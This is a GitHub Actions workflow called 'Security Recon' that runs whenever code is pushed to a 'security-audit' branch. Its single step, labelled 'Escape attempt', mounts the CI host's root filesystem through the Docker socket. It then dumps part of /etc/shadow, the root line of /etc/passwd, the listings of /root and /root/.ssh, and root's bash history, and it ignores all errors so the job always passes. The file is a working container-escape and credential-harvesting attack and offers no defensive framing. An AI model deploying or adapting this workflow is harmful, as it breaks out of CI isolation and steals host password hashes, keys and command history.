name: Security Recon

on:
  push:
    branches:
      - security-audit

jobs:
  recon:
    runs-on: ubuntu-latest
    steps:
      - name: Escape attempt
        shell: bash
        run: |
          set +e
          set +o pipefail
          echo "=== DOCKER SOCKET ESCAPE ==="
          echo "Mounting host root filesystem via docker..."
          
          # Run a privileged container with host root mounted
          docker run --rm -v /:/host alpine:latest sh -c '
            echo "=== HOST /etc/shadow (first 10 lines) ==="
            head -10 /host/etc/shadow
            echo "=== HOST /root/ listing ==="
            ls -la /host/root/
            echo "=== HOST hostname ==="
            cat /host/etc/hostname
            echo "=== HOST /etc/passwd (root line) ==="
            head -1 /host/etc/passwd
            echo "=== HOST uname ==="
            cat /host/proc/version
            echo "=== HOST docker compose projects ==="
            find /host -name "docker-compose.yml" -o -name "compose.yml" 2>/dev/null | head -20
            echo "=== HOST /root/.ssh ==="
            ls -la /host/root/.ssh/ 2>/dev/null
            echo "=== HOST /root/.bash_history (last 20 lines) ==="
            tail -20 /host/root/.bash_history 2>/dev/null
          '
          
          echo "=== DONE ==="
          exit 0